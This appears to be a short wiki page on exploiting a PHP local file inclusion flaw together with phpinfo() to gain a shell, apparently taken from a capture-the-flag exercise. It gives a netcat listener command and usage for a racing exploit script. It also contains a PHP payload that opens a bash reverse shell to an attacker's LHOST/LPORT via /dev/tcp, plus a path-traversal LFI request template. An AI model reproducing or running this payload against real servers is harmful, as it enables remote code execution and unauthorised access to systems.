PHPInfo attacks

lethanhtung01011980 edited this page Jun 18, 2020


  To attack PHPInfo


PHPINFO (with upload function) to upload and LFI to get back result.

It's time for some simple maths:

LFI + phpinfo() = SHELL :D

Don't forget to change LHOST, LPORT inside the script and to setup your listener:

  • $ nc -lvp 60001
  • Usage : python2 ./ 80 number_of_threads
  • Because we deal with a racing condition, you may have to run this script a couple of times until it succeeds. But I have tested it and it definitely works. :D


  • Need to fix PHPSESSID after using Burp
  • Payload: PAYLOAD="""Security Test\r<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"""+str(LHOST)+"""/"""+str(LPORT)+""" 0>&1'\");?>\r"""
  • Need /.. before %s: LFIREQ="""GET /department/manage.php?notes=/ninevehNotes.txt/..%s HTTP/1.1\r


